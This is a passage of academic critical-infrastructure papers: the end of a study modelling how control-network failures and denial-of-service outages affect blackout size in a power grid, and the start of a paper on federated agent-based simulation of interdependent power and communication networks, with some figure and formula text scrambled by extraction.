3 Cyber Interdependencies An interdependency is a bidirectional relationship between two infrastructures through which the state of each infrastructure influences or is correlated to the state of the other. Among the several types of interdependencies identified in [8], our interest is on the cyber interdependencies, which in general occur when the state of an infrastructure depends on information transmitted through the information infrastructure the former has relation with. In our context, EI requires information transmitted and delivered by ITCS, for example when RTS triggers a grid reconfiguration (RS2 ()); therefore the state of EI depends on the outputs of ITCS. Cyber interdependencies are especially critical considering the possible ITCS failures that may impact on the state of EI, depending on the logical components affected by the failures, and obviously on the type of the failures. For example, consequences of a failure of the component LCS associated to an EI component NG , NS or NL can be: Omission failure of LCS, fail silent LCS. No (reconfiguration) actions are performed on the associated EI component. Time failure of LCS. The above (reconfiguration) actions are performed after a certain delay (or before the instant of time they are required). Value failure of LCS. It is performed an incorrect closing (or opening) of the power lines directly connected to the associated component, or an incorrect variation of the power produced by the associated generator. Failures of the components LCS can also impact on the input values that the component RT S receives from LCS. These values can be omitted, delayed (or anticipated) or erroneous. Since reconfigurations required by RT S are actuated by the associated components LCS, a failure of a component LCS can also impact on the reconfigurations required by RT S. The failure of the component RT S corresponds to an erroneous (request of) reconfiguration of the state of EI (including an unneeded reconfiguration) affecting one or more components of the controlled region. The effect of the failure of RT S on a component N is the same as the failure of the component LCS associated to the component N. In the case of Byzantine failure these effects can be different for each component N. In general, the failure of the components LCS and RT S may depend on the failures of the network connecting them.
4 The Overall SAN Model for the Analyzed EPS Instance The body of the modeling framework has been already introduced in [3], where the authors also discussed the feasibility of the proposed framework using M¨obius [9], a powerful multi-formalism/multi-solution tool, and presented the implementation of a few basic modeling mechanisms adopting the Stochastic Activity Network (SAN) formalism [10], which is a generalization of the Stochastic Petri Nets formalism.
Interdependency Analysis in Electric Power Systems
65
In this section we show the composed SAN model representing the overall considered EPS instance. The following atomic models have been identified as building blocks to generate the overall EPS model: – PL SAN, which represents the generic power line with the connected transformers. – PR1 SAN and PR2 SAN, which represent the generic protections and the breakers connected to the two extremities of the power line. – N SAN and LCS SAN, which represent, respectively, a node of the grid (a generator, a load or a substation) and the associated Local Control System (see Figure 1). – AUTOEV SAN and RS SAN, which represent, respectively, the automatic evolution (autoevolution) of EI when an event modifying its state occurs, and the local reconfiguration strategy applied by LCS (function RS1 ()). – RTS SAN and COMNET SAN, which represent, respectively, the Regional Telecontrol System RTS, where the regional reconfiguration strategy RS2 () is modeled, and the public or private networks (ComNet of Figure 1). In Figure 2, it is shown how the atomic models are composed and replicated to obtain the composed model representing the EPS region.
Fig. 2. Composed model for an EPS region
The model AL represents a power line with the associated protections and it corresponds to AL logical component of Figure 1. This model is then replicated to obtain all the necessary non anonymous AL components of the grid. The model N LCS is obtained by composing the atomic models N SAN and LCS SAN. Then the model is replicated to obtain all the necessary non anonymous NG , NS and NL components of the grid, with the associated LCS. The model Auto Control is obtained by composing the atomic models AUTOEV SAN and RS SAN, so it represents both the autoevolution function and the reconfiguration strategy locally applied by the LCS components. The overall EPSREG model is finally obtained through composition of the different models and it represents the EPS instance under study. The different atomic models interact with each other sharing some places (common and extended) that represent the parameters or part of the states of the EPS, like the topology of the grid, the susceptance of each line, the initial and the current power of each node of the grid, the initial and the current power flow through each line of the grid,
66
S. Chiaradonna, F. Di Giandomenico, and P. Lollini
the status of the propagation of a failure or a lightning, the disrupted/failed components, the open lines, etc. These models populate our modeling framework as template models, which are used to represent a large variety of specific scenarios in the EPS sector. Theoretically, all the possible EPS configurations involving (a subset of) the addressed components are representable through proper combination of the proposed models, unless some aspects have been currently not yet captured. Exercising the developed framework on several different scenarios will be useful to reveal possible aspects not included and then proceed with a refinement.
5 Analyzed Power Grid, Measures of Interest and Failure Scenarios The analyzed electric power grid is depicted in Figure 3. The grid is a portion of the IEEE 118 Bus Test Case2 , typically used in other studies related to EPS. The label associated to the generators represents the initial (active) power and the maximum power that a generator can supply (“Pi /Pimax ”). The label associated to the loads represents the power demand of a load (“Pi ”). The label associated to the lines represents the initial power flow through the line and the susceptance3 (“Fi j (bi j )”). We suppose that each line can carry the same maximum power flow (Fimax = 620 MW for each i, j). In the j initial grid setting all the ratios Pi /Pimax are equal to a fixed value α = 0.85, called the power grid stress level. By varying α , other EI settings are automatically determined. The measure of interest we consider is PUD (t,t + 1), defined as the percentage of the mean power demand that is not met in the interval [t,t + 1] (the symbol ’UD’ stands for ’Unsatisfied Demand’). It is a user-oriented measure of the blackout size and can be obtained as the load shed (i.e., the not served power due to a load shedding) divided by the power demand. In this paper we aim to assess the impact of cyber interdependencies on the defined black-out related indicator. Among the possible interdependencies (ITCS failures affecting EI) detailed in Section 3, in this paper we evaluate the impact on PUD (t,t + 1) of the omission failure of the communication network (ComNet of Figure 1) when a simultaneous failure of a set of transmission lines occurred. This is a scenario inspired by those considered in the project CRUTIAL. More in detail, the EI state is initially set as depicted in Figure 3, and it is in electrical equilibrium. At time zero we suppose that nLF power lines are simultaneously affected by a permanent disruption (e.g., due to a tree fall or a terrorist attack), thus becoming unavailable. The power lines that fail are randomly (uniformly) selected from the set of all available power lines. The repair time of the failed power lines is fixed to 24 hours. At the same time zero, the communication network ComNet connecting the LCS components to RTS is simultaneously affected by a denial of service (DoS) attack, thus impeding the LCS-RTS communication. Therefore, during a DoS attack, the reconfiguration strategy RS1 () can be applied at any time, while the reconfiguration strategy RS2 () cannot be applied. The DoS attack ends after 2 3
http://www.ee.washington.edu/research/pstca/pf118/pg tca118bus.htm The susceptance is used to determine the values for the power flow through the lines.
Interdependency Analysis in Electric Power Systems -78
-104
21
23
60 (48)
-38
22 (29)
15
65 (12)
3
-50
-120
18
25
43/51
164 (19)
217 (20)
-78 (125)
15 (6)
4
242 (37)
-34 13
2 (11)
-48
20
11 -22
6
22 -90
-25 (10)
212 (20)
36 (12)
97 (20)
-72
-46 (30)
17
67
379 (26)
7 (9)
62 (33) -56 19
-159 26
-8 (13)
-118 24
-50 (5)
7
136 (9) -510 (33)
6
-36 14
-12
24 (13) 36 (16)
-29 (12) -14
5
16 -44
20 (96)
9
8
-77 (6)
-16
-510 (31)
10 -20
-57 (10)
12 -28
167 (12)
-227 (12) 212 (6) 0
2
510/600
249/293
189 (26)
1 356/419
Fig. 3. Diagram of the EI grid (generators are circles, loads are squares and substations are rhombi). For the sake of clarity, only the integer part of the original values associated to generators, power lines and loads are shown (in MegaWatt).
an exponentially distributed time with mean MT T RCNET , and from that time RTS can start computing the RS2 () reconfiguration action that will be applied after 10 minutes. The considered distributions and values for failure, repair and reconfiguration processes do not refer to any specific real case; they are hypothetical but plausible ones and are used just for showing the potentialities of our analysis method. However, to take into consideration to some extent variations of assumed settings, we performed a sensitivity analysis on the following parameters: – MT T RCNET , thus varying the duration of the DoS attack affecting the communication network. If MT T RCNET → ∞, then we are modeling a RTS omission failure. – nLF , thus varying the severity of the overall EI failure. – α , thus varying the initial stress level of the power grid.
6 Numerical Evaluations and Analysis of the Results In this section we present some of the results that we obtained through the solution of the overall model previously sketched. A transient analysis has been performed, using the simulator provided by the M¨obius tool [9]. For each study we executed a minimum of 2000 simulation runs (batches), and we set the relative confidence interval to 0.1 and the confidence level to 0.95. This means that the stopping criteria will not be satisfied until the confidence interval is within 10% of the mean estimate in 95% of the times.
68
S. Chiaradonna, F. Di Giandomenico, and P. Lollini
10.0
MTTRCNET=24 h, α=0.95, nLF=2 MTTRCNET=6 h, α=0.95, nLF=2 MTTRCNET=24 h, α=0.85, nLF=2 MTTRCNET=6 h, α=0.85, nLF=2 MTTRCNET=24 h, α=0.95, nLF=1 MTTRCNET=6 h, α=0.95, nLF=1 MTTRCNET=24 h, α=0.85, nLF=1 MTTRCNET=6 h, α=0.85, nLF=1
PUD(t,t+1) (%)
8.0
6.0
4.0
2.0
0.0 0
6 12 18 24 30 36 42 48 54 60 66 72 78 84 90 96 t (h)
Fig. 4. Percentage of the mean power demand that is not met in the interval [t,t + 1], with t = 0, 1, . . . , 96 hours, for different values of MT T RCNET (6, 24 hours), nLF (1, 2) and α (0.85,0.95) 30.0 No repair of CNET, nLF=5 MTTRCNET=24 h, nLF=5 MTTRCNET=6 h, nLF=5 MTTRCNET= 24 h, nLF=4 MTTRCNET=6 h, nLF=4 MTTRCNET= 24 h, nLF=3 MTTRCNET=6 h, nLF=3 MTTRCNET= 24 h, nLF=2 MTTRCNET=6 h, nLF=2 MTTRCNET= 24 h, nLF=1 MTTRCNET=6 h, nLF=1
PUD(t,t+1) (%)
25.0
20.0
15.0
10.0
5.0
0.0 0
6 12 18 24 30 36 42 48 54 60 66 72 78 84 90 96 t (h)
Fig. 5. Percentage of the mean power demand that is not met in the interval [t,t + 1], with t = 0, 1, . . . , 96 hours and α = 0.95, for different values of MT T RCNET (6, 24 hours) and nLF (1, 2, 3, 4, 5)
In Figure 4 we show the PUD (t,t + 1) variations as a function of time t (hours) for different durations of the DoS attack (exponentially distributed with mean MT T RCNET = 6 or 24 hours), for a different number of simultaneous power line disruptions (nLF = 1 or 2) and for different initial stress levels (α = 0.85 or 0.95). We note that the failure of even a single random power line at time zero produces an immediate increment of PUD (t,t + 1) greater than 2%. For α = 0.95, the values of PUD (t,t + 1) increase rapidly over time until the reconfiguration strategy RS2 () is applied (i.e., 10 min. after the DoS
Interdependency Analysis in Electric Power Systems
10
t=0 h t=5 h t=6 h t=23 h t=24 h
-1
10-2
(90,100]
(80,90]
(70,80]
(60,70]
(50,60]
(40,50]
(30,40]
(20,30]
10-4
(10,20]
-3
(0,10]
10
0
PDF of PUD(t,t+1) (Probability)
100
69
Possible values PUD(t,t+1) can take (%)
Fig. 6. Probability that PU D (t,t + 1) is in the interval (a, a + 10]%, with a = 0, 10, 20, . . . , 90, fixing α = 0.95, nLF = 1 and MT T RCNET = 24 hours
attack ends). This is the effect of the cascading failures of the overloaded lines and of the too big variation of power demand to generators in a small interval of time. In fact, with a high value of the power grid stress α = 0.95, the autoevolution function AS() or the reconfiguration strategy RS1 () triggered by the failure of even a single power line can produce overload of lines or stress of generators. On the contrary, with the lower stress level α = 0.85, the failure of only one power line leads EI to reach a stable state that does not need a RTS reconfiguration (no shedding operations are needed), and PUD (t,t + 1) remains constant in the interval [0, 24]. At t = 24 hours there is a big improvement due to the repair of the failed power lines and then the nominal conditions in the system are restored, with the consequent full satisfaction of the power demand after some time. It is worthwhile to note that the impact of the system stress level α is less heavy on the percentage of unsatisfied demand than the failure of power lines: e.g., the curve with α = 0.95 and nLF = 1 is better than the one with α = 0.85 and nLF = 2. Figure 5 shows how PUD (t,t + 1) varies as a function of time t (hours) for different durations of the DoS attack (MT T RCNET = 6 or 24 hours) and for a different number of simultaneous power line disruptions (nLF = 1, 2, 3, 4 or 5), fixing α = 0.95. As expected, PUD (t,t + 1) increases considering higher nLF values, and fixing the value for nLF , PUD (t,t + 1) gets worse in the case in which the DoS attack has a longer duration (24 hours). In fact, if MT T RCNET = 6 hours, RTS can earlier apply the RS2 () reconfiguration action (on average, after 6 hours and 10 min.), and then EI moves into a state less degraded than the state in which EI would be without considering the RTS reconfiguration. After 24 hours the disrupted power lines are repaired, and consequently PUD(t,t + 1) rapidly decreases until reaching the zero value, since the original EI grid configuration (with all the loads satisfied) has been restored. The usefulness of applying the RTS reconfiguration can be really appreciated comparing all the plots with the first one, representing the case in which no RTS reconfiguration is performed (RTS omission failure).
70
S. Chiaradonna, F. Di Giandomenico, and P. Lollini
In both Figures 4 and 5 we have provided mean values for the percentage of unsatisfied power demand in an interval [t,t + 1] for different values of t. In Figure 6 we show the discrete probability distribution function (PDF) of PUD (t,t + 1) for different values of t = 0, 5, 6, 23, 24 hours, fixing α = 0.95, nLF = 1 and MT T RCNET = 24 hours. Analyzing the corresponding plot in Figure 4 we see that the mean value of the percentage of the non delivered power in the interval [0, 1] (first hour) is PUD (0, 1) ≈ 2.5%. Analyzing its complete distribution in Figure 6, for t = 0, we note that: i) with a very high probability 0.9 the percentage of undelivered power is equal to zero; ii) PUD (0, 1) is in the interval (0, 10]% with a probability of about 0.03, and it is in the interval (40, 50]% with a probability of about 0.06; iii) all the other probabilities are almost zero. A mean loss of 40-50% of delivered power in the first hour of the system can happen, for example, when the power line affected by the failure is directly connected to a generator. The other plots with t = 5, 6, 23, 24 hours have similar trends.
7 Conclusions This work has addressed the modeling of electric power systems and a quantitative assessment of the impact of failures through interdependencies between the cyber control infrastructure and the controlled electric grid. Reporting from the activity carried on in the European CRUTIAL project and inspired by the failure scenarios there identified as critical ones, we have modeled an instance of EPS made up of a regional teleoperation system and the local control systems connected to it. Simulation analyses have been performed on a portion of the IEEE 118 Bus Test Case, to evaluate the user perceived degradation of the power demand satisfaction under varying failures and system conditions. Although the shown analyses exploit only partially the potentialities of the referred modeling evaluation framework, the obtained results allow to understand some relevant dynamics in failures propagation and their impact through infrastructures interdependencies. Such insights can be usefully exploited towards proper system configurations enhancing resiliency and survivability. For example, the EPS analysis under different stress levels is useful to find a proper configuration of the power grid so to limit the power lines overloading in case of failures. Also, understanding the effect of repair times of the communication network allows to better calibrate repair operations to enhance system availability. Future work includes an extension of the evaluation campaign by introducing other patterns of components failures, as well as enriching the set of measures of interest for the analyses. Currently, we are conducting evaluations to identify the most critical power lines for a given topology; this analysis allows to understand which power lines are especially critical and need to be protected most.
Acknowledgment This work has been partially supported by the European Community through the IST Project CRUTIAL [2] (Contract n. 027513).
Interdependency Analysis in Electric Power Systems
71
References 1. Chiaradonna, S., Di Giandomenico, F., Lollini, P.: Evaluation of critical infrastructures: Challenges and viable approaches. In: De Lemos, R., Di Giandomenico, F., Gacek, C., Muccini, H., Vieira, M. (eds.) Architecting Dependable Systems V. LNCS, vol. 5135, pp. 52–77. Springer, Heidelberg (2008) 2. CRUTIAL: European Project CRUTIAL - critical utility infrastructural resilience (contract n. 027513), http://crutial.cesiricerca.it 3. Chiaradonna, S., Lollini, P., Di Giandomenico, F.: On a modeling framework for the analysis of interdependencies in electric power systems. In: IEEE/IFIP 37th Int. Conference on Dependable Systems and Networks (DSN 2007), Edinburgh, UK, June 2007, pp. 185–195 (2007) 4. Romani, F., Chiaradonna, S., Di Giandomenico, F., Simoncini, L.: Simulation models and implementation of a simulator for the performability analysis of electric power systems considering interdependencies. In: 10th IEEE High Assurance Systems Engineering Symposium (HASE 2007), pp. 305–312 (2007) 5. Dobson, I., Carreras, B.A., Lynch, V., Newman, D.E.: An initial model for complex dynamics in electric power system blackouts. In: 34th Hawaii Int. Conference on System Sciences (CDROM), Maui, Hawaii, 9 page. IEEE, Los Alamitos (2001) 6. Chen, J., Thorp, J.S., Dobson, I.: Cascading dynamics and mitigation assessment in power system disturbances via a hidden failure model. Electrical Power and Energy Systems 27(4), 318–326 (2005) 7. Anghel, M., Werley, K.A., Motter, A.E.: Stochastic model for power grid dynamics. In: 40th Hawaii Int. Conference on System Sciences (CD-ROM), Waikoloa, Big Island, Hawaii, pp. 113–122. IEEE, Los Alamitos (2007) 8. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine, 11–25 (December 2001) 9. Daly, D., Deavours, D.D., Doyle, J.M., Webster, P.G., Sanders, W.H.: M¨obius: An extensible tool for performance and dependability modeling. In: Haverkort, B.R., Bohnenkamp, H.C., Smith, C.U. (eds.) TOOLS 2000. LNCS, vol. 1786, pp. 332–336. Springer, Heidelberg (2000) 10. Sanders, W.H., Meyer, J.F.: Stochastic activity networks: Formal definitions and concepts. In: Brinksma, E., Hermanns, H., Katoen, J.-P. (eds.) FMPA 2000. LNCS, vol. 2090, pp. 315– 343. Springer, Heidelberg (2001)
Modeling and Simulation of Complex Interdependent Systems: A Federated Agent-Based Approach Emiliano Casalicchio, Emanuele Galli, and Salvatore Tucci University of Roma - Tor Vergata, Roma 00133, Italy {emiliano.casalicchio,tucci}@uniroma2.it,
[email protected] Abstract. Critical Interdependent Infrastructures are complex interdependent systems, that if damaged or disrupted can seriously compromise the welfare of our society. This research, part of the CRESCO project, faces the problem of interdependent critical infrastructures modeling and simulation proposing an agent-based solution. The approach we put forward, named Federated ABMS, relies on discrete agent-based modeling and simulation and federated simulation. Federated ABMS provides a formalism to model compound complex systems, composed of interacting systems, as federation of interacting agents and sector specific simulation models. This paper describes the formal model as well it outlines the steps that characterize the Federated ABMS methodology, here applied to a target system, composed of a communication network and of a power grid. Moreover we conclude the paper with a thorough discussion of implementation issues.
1
Introduction
Many researches on Critical Infrastructure Protection are committed to solve the challenging problem of interdependencies modeling and analysis or more in general of modeling and simulation of critical interdependent infrastructures. While some research results are based on mathematical models [15,12,2,11,16,20], other solutions rely on discrete simulation (see [1] for an extended survey) and discrete agent-based simulation [10,17,3,18] and SimCIP (http://www.irriis.org). This research, part of the CRESCO project, faces the problem of modeling and simulation of interdependent critical infrastructures proposing an approach based on discrete agent-based modeling and simulation and federated simulation (Federated Agent-based Modeling and Simulation - Federated ABMS). The idea behind Federated ABMS is the following. A compound complex system, composed of interacting complex systems, can be modeled as a set of interacting agents. The behavior of each agent is modeled by a sector-specific model. Then, the whole model for the compound complex system is obtained federating the agent-based models and the sector specific models. The abstraction introduced by Federated ABMS relieves the modeler of the details of the complex system models (viewed as a black-box), allowing to concentrate her/his R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 72–83, 2009. c Springer-Verlag Berlin Heidelberg 2009
Modeling and Simulation of Complex Interdependent Systems
73
attention on the modeling of the compound complex system and on interdependencies modeling. Another advantage of Federated ABMS is the possibility to simulate with greater detail the agent behavior re-using sector specific simulation models. The concept of Federated ABMS was previously introduced in [9] where the authors mainly discuss simulation and implementation issues and present preliminary results without going into the details of the agent model, and without providing details of the interdependencies model. As mentioned before, in the literature there are different research projects that propose agent-based modeling and simulation techniques to study critical interdependent infrastructures, or that aim at integrating existing simulation models to study the behavior of complex interdependent systems. In [10] the authors describe CIMS, an agent-based simulation framework to study Critical Interdependent Infrastructures. The paper does not give details on how the agent-based modeling techniques were applied. In [17] the authors propose a Critical Infrastructure simulation framework that relies on agents but they do not address the problem of how to model the detailed behavior of complex infrastructures. In [3] the authors propose an agent based simulation model of critical infrastructures. In the paper there are neither details on the interdependencies model nor on implementation aspects of the simulation framework. In [8] the authors investigate how to use agent-based modeling and simulation and UML to study critical infrastructures interdependencies. SimCip is a simulation framework that relies on agent based micro simulation and integrate different simulation models. In [19] the authors propose different modeling and simulation study of telecom networks in case of emergencies or in disaster scenarios. This paper contributes to the literature as in the following. First of all we formalize the concept of federated agent based modeling, providing a formalism to model compound complex systems, composed of interacting systems. The introduced formalism allows: i) to abstract the functional aspects of the infrastructure behavior, modeled in greater depth re-using existing sector specific models; ii) to model direct and cyber interdependencies as service exchange among infrastructures; iii) to model geographical and logical interdependencies as infrastructure perturbations. Therefore, we outline the steps that characterize the Federated ABMS methodology, and we show how to apply the methodology to a target system composed of a communication network and of a power grid. Finally, we conclude with a thorough discussion on implementation issues. It is worth to remark that the proposed methodology is not intended as a direct support for decision makers, who need easy-to-use model composition and results visualization tools. Federated ABMS is intended as a modeling and simulation methodology for whom want to design and to implement modeling and simulation tools for decision making. The paper is organized as follows. In section 2 we introduce the federated agent-based modeling formalism and methodology. In section 3 we explain how federated ABMS can be applied to a simple case study. In section 4 we discuss implementation issues about federated ABMS. Section 5 concludes the paper.
74
2
E. Casalicchio, E. Galli, and S. Tucci
Agent-Based Modeling of Interdependent Complex Systems
As shown in many research works, agents can be used to model interdependent complex systems (e.g. [13]). A general definition of agent is the following [4]: Definition 1. An agent is an entity with a location, capabilities and memory. The entity location defines where it is in a physical space ... What the entity can perform is defined by its capabilities ... the experience history (for example, overuse or aging) and data defining the entity state represent the entity’s memory. A critical infrastructure is characterized by its location, its behavior, interaction capabilities and its internal state. Then a critical infrastructure can be modeled as an autonomous agent and the system composed of interdependent critical infrastructures can be modeled as interacting agents which cooperate and/or compete to realize a common or an individual goal. 2.1
The Federated Agent-Based Model
An agent a is described by the tuple (Va , Sa , Xa ) where: a a 1. Va = {v1a , ..., vN ∈ Via and |Va | = Nva . Va is the set of the agent a }, vi v a attributes and Vi is the domain of the agent attribute i. The values assumed by the agent attributes at time t represent the state of the agent. 2. Sa = {sa1 , ..., saNsa }, |Sa | = Nsa , is the set of services that the agent a provides to other agents. In our model agents interact exchanging services. 3. Xa = {xa1 , ..., xaNxa } (|Xa | = Nxa ) is the set of inputs of the the agent a. Inputs can be services produced by other agents or perturbations. A perturbation is an unpredictable event that modifies the agent state and alters the behavior of the agent a, reducing the a’s capabilities to provide services. An input is characterized by the tuple xai = (tx , x) where x ∈ Xia is the value of the input, Xia the set of possible values for the ith input of agent a, and tx the time at which the value x is available (tx ∈, R+ or tx ∈, N+ if we consider continuous or discrete time respectivelly).
Comparing the proposed federated agent-based model with the Definition 1 we have that: 1. the agent state, memory and location are modeled by the agent attributes Va ; 2. Sa and Xa model the capability of the agent to interact with other agents providing services and consuming data or services; 3. the agent behavior, that determines how inputs are processed, how services are provided and how the agent state evolves, is modeled using a sector specific model of the complex system modeled.
Modeling and Simulation of Complex Interdependent Systems {e1,...,em, {s1} Qpg,cn pg cn o ,...,o om+p} 1 Mcn Vpg={g { 1,…,gn,pc1,…,pcn, Vcn={n1,...,nm,l1,...,lr} sc1,…sc scq,ll1,…,llr}
Sa.req Va
Sa.resp
Vpg
V’a Detailed system model
Behaviour Model
V’pg
Detailed Power Grid model
ss.ressp
Va
ss.req q
Agent Model
{ss1.req q…sq.req q}
Sa
{s1.resp p…sq.resp p}
{s1...sq}
{f1,…,fu} Xa
75
Vcn
V’cn
Detailed Network model
Fig. 1. The federated agent-based Fig. 2. The federated agent model of a complex model interdependent system composed of the power grid (left) and of the communication network (right)
Figure 1 shows the proposed federated agent model. It is worth to note that only the agent a can interact directly with the detailed model of the complex system abstracted by a. Let us now define the relationship among agent attributes, services and inputs. The agent state Va is a function of the time and of the agent inputs Xa , and implicitly of the agent behavior (as it will be explained in the following). Assuming that the time is discrete, t ∈ N+ , and that each agent attribute via depends on a subset of the agent inputs {xaji , ..., xaji } we have: n
1
via = fia (t, xaj1 , ..., xajn ), fia : N+ × Xja1 × ... × Xjan → Via . The dependency of the agent attributes on the agent inputs is defined by the mapping1 1 if xai ∈ dom(fja ) Nxa ×Nva Ma = {mi,j } , mi,j = (1) 0 otherwise It’s important to remark that fia and Ma depend on the specific system modeled and on the specific goal of the modeling and simulation study, then it is impossible to provide a generic expression for them. In section 3 we give an example of fia and Ma . The service sai is function of the time, of the agent state, of the agent inputs i,a i,a i,a and of a set of service input parameters pi,a 1 , ..., pN i,a , pj ∈ Pj : p
sai =
i,a gia (t, vja1 , ..., vjan , pi,a 1 , ..., pNpi,a )
gia : N+ × V × P → N+ × [0, 1], i,a where V = Vja1 × ... × Vjan and P = P1i,a × ... × PN i,a . p
1
dom(f ) is the domain of the function f and cod(f ) the co-domain of the function f .
76
E. Casalicchio, E. Galli, and S. Tucci
In our model we assume that sai = (t, 1) if the i − th service, invoked at time t , is delivered at time t ≥ t . On the contrary, sai = (t, 0) if the service can not be delivered. In the latter case, the time t is meaningless or, depending on the specific service, it can be interpreted as the service time out. The proposed on-off model for service delivery can be extended considering that sai can be provided at different QoS levels s, 0 ≤ s ≤ 1. The QoS level s=0 means that the service is not delivered and the QoS level s=1 means that the service is delivered at the 100% of the QoS level. The last step toward the definition of a federated agent-based model is to provide a solution for (i) a model of the agent state evolution, (ii) a model of service delivery and (iii) a model of service delivery time. We address issues (i)-(iii) using a detailed model of the target complex system. The innovative idea we introduce is to consider the detailed system model as a black-box controlled by the agent model and that computes the new system state, the services delivery time and the service level. The interaction between the agent model and the detailed system model (see Figure 1) is determined as follow. The agent model requests, at the detailed system model, to compute the new system state Va on the basis of the actual agent state Va and of the services requested Sa .req. The service response and the service delivery time are computed by the detailed system model and returned in Sa .resp. In the proposed solution the agent model plays the role of the orchestrator of the simulation, while the detailed system model plays the role of a simulation component that receives, from the orchestrator, the system workload (Va , Sa .req).
2.2
Interconnecting Agents: The Interdependencies Model
Interdependencies can be classified as [15]: physical, geographical, cyber, and logical. In our model, physical and cyber interdependencies are modeled as service exchange. Moreover, the concept of perturbation allows to model geographical and logical interdependencies. In this work we concentrate our attention on cyber and physical interdependencies. Two agents a and b interact if there is at least one service provided by a that is an input for b: sai (t) = xbj (t) for some 1 ≤ i ≤ Nsa and 1 ≤ j ≤ Nxb . In this case the agent b depends on the behavior and on the services provided by a, then a and b are interdependent. If a depends on b and b on a we have cyclic interdependencies and if a and b do not interact directly but interact through a chain of agent interactions we can say that a and b are indirectly interdependent. Then the interdependencies between agents a and b are modeled by the mappings: 1 if sai = xbj Nsa ×Nxb Qa,b = {qi,j } , qi,j = (2) 0 otherwise and Mb (defined in equation 1). The mapping Qa,b defines how a and b interact, while the mapping Mb defines how b’s state is influenced by b’s inputs. In the
Modeling and Simulation of Complex Interdependent Systems
77
same way, cyclic interdependencies can be described by four mappings Qa,b , Mb , Qb,a , Ma . 2.3
The Federated ABMS Methodology
The steps toward the definition of an federated agent-based model are the following: 1. Identification of the simulation study goals. 2. Identification of the complex systems (e.g. infrastructures) that compose the compound complex system under study. 3. For each component system identified in step 2, identify: (a) the set of variables that are representative of the system state; (b) the set of services that allow to represent the interaction of the complex system with the other component systems, with the environment and with human beings; (c) the set of perturbations and inputs that influence the component system behavior; (d) the relationship among agent inputs and agent state variable. Steps (a)-(c) should be supported by series of interviews of infrastructures experts. 4. Associate an agent a to each system identified in step 3 and define the related agent model (Va , Xa , Sa ) and Ma . Va , Xa Sa and Ma are determined in steps 3.(a)-3.(d) respectively. 5. For each agent defined in the previous step identify the sector-specific simulation model useful to simulate the infrastructure behavior. 6. Identify the system interdependencies, for example using interviews of infrastructure experts. 7. For each couple of infrastructures a and b (a = b) define the interdependencies matrix Qa,b .
3
The Case Study
In the following we apply the federated agent-based methodology to a target complex system composed of an IP communication network (cn) and of a power grid (pg). We suppose that the communication network depends on the power grid, and that there are no auxiliary power mechanisms. For lack of space we concentrate our attention on the above described steps 4 and 7. The network state Vcn is represented by {n1 , ..., nm , l1 , ..., lr } where ni is a network node (router, access point, switch,...) and lj is a network link connecting two network nodes; m is the number of nodes and r the number of links. We assume that ni = 1 (li = 1) if the node (link) i works and ni = 0 (li = 0) if the node (link) i does not work. The agent inputs are Xcn = {e1 , ..., em , o1 , ...om+p } where ei models the power supply (electricity) for the network node ni and oi models an unpredictable system outage for the network node ni (link li ). ei = 0 means that the node ni
78
E. Casalicchio, E. Galli, and S. Tucci
can not be supplied by the power grid. oi = 1 means that ni (li ) has experimented an outage and it can not work. The mapping Mcn that models the dependencies of the state variables on the agents inputs is the following n1 , ..., nm , l1 , ..., lp e1 .. . em o1 .. .
Im
0p
Im+p
om+p where Im is an m × m identity matrix and 0p is a p × p null matrix. In our simplified model the relationship fcn among the agent inputs and agent state is modeled by the following function: ⎧ ⎫ ⎨ ni = 0 if (ei = 0) or ((ei = 1) and (oi = 1)), ∀t ⎬ fcn = li = 0 if oi = 1, ∀t ⎩ ⎭ ni = 1, li = 1 otherwise, ∀t The service provided by the communication network is “send a message from ni to nj ” where ni and nj are two network access point. Then our simplified network model provides only one service s with two input parameters p1 and p2 , where p1 is the source node and p2 is the destination node. s = (tR , 1) if the message is delivered at time tR (the service response time) and s = (·, 0) if the service can not be delivered because the internal state of the communication network, given by the value of {n1 , ..., nm , l1 , ..., lp }. To determine the internal state evolution of the communication network on the basis of the agent inputs and service requests we use an event-driven network simulation model implemented using OMNeT++ (http://www.omnetpp.org). Figure 2 (right) shows the connection between the agent model and the detailed network simulation model. The power grid model considers the following components: power generators (or generation plants) pg, primary cabins pc, secondary cabins sc and distributions/transmission lines d. Then the power grid state is modeled by the set of attributes Vpg = {pg1 , ...pgn , pc1 , ..., pcr , sc1 , ..., scq , d1 , ..., dz } where: pgk = 1 if the generator k work properly and gk = 0 otherwise; pck = 1 if the primary cabin k work properly and pck = 0 otherwise; sck = 1 if the secondary cabin k work properly and sck = 0 otherwise; and dk = 1 if the distribution or transmission line k work properly and dk = 0 otherwise. There are many external factors that can influence the power grid behavior, however, for simplicity, we consider only faults {y1 , ...yu }, u = n + r + q + z. If yk = (t, 1) the power grid component k will experience a fault at time t. Otherwise, if yk = (t, 0), the component k does not experiment any outage or it is repaired at time t after a fault at time t < t.
Modeling and Simulation of Complex Interdependent Systems
79
Then we can define Mpg = {mi,j }u×u = Iu×u and vi = 1 if yi = 1, ∀t fpg = vi = 0 otherwise, ∀t where vi is a power grid component pgi , pci , sci , di . The service provided by the power grid is “provide the electricity to the secondary cabin lk ”. We assume that the load is attached directly to the secondary cabins through a bus. Then we have q services: sj = (t, 1) if the secondary cabin scj is operative at time t and sj = (·, 0) otherwise. The value of sj depends on the state of all the power grid components (generators, primary cabins and links). In the CRESCO project the power grid behavior is modeled using a load flow model (that is a time independent model). At time t the power grid simulation model receives as input Vpg and it recomputes the power flow, producing the new values for the model state Vpg . The interdependencies between the power grid and the communication network, identified in step 6, are defined by the mappings 1 if si = ej Nspg ×Nxcn Qpg,cn = {qi,j } , qi,j = 0 otherwise and by Mcn previously defined. For simplicity and for lack of space we do not model the power grid control functionalities, that is the dependency of the power grid on the communication network.
4
Implementation Issues
The implementation of a federated agent-based simulation model is a challenge and there are many open issues. To mention a few: model validation, experiment reproducibility, extensibility to diverse and unforeseen scenarios, simulation scalability, implementation of agents and simulation models federations. In the following we discuss in detail the last two issues. 4.1
Implementation of Agents
